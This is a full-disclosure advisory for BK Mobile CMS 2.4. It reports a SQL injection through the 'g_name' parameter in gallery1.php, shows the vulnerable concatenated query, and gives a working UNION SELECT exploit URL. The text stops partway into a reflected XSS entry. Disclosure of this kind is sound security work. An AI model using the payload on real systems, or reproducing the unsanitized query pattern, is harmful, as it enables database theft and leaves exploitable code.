## FULL DISCLOSURE #Product : BK Mobile CMS #Exploit Author : Rahul Pratap Singh #Version : 2.4 #Home page Link : http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358 #Website : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 27/Jan/2016 SQLi Vulnerability: ---------------------------------------- Description: ---------------------------------------- "g_name" parameter is not sanitized that leads to SQL Injection. ---------------------------------------- Vulnerable Code: ---------------------------------------- file: gallery1.php line 5 $get_g_name = $_GET['g_name']; $query_photos = "SELECT * FROM ".$get_prefix."photos WHERE gallery_name='".$get_g_name."' ORDER BY id DESC"; ---------------------------------------- Exploit: ---------------------------------------- http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=1%27%20union%20all%20select%201,2,3,group_concat%28version%28%29%29,5--+ ---------------------------------------- POC: ---------------------------------------- https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatesqlipoc.png XSS Vulnerability: ---------------------------------------- Description: ---------------------------------------- "g_name" parameter is not sanitized that leads to reflected XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- file: gallery1.php line 81-88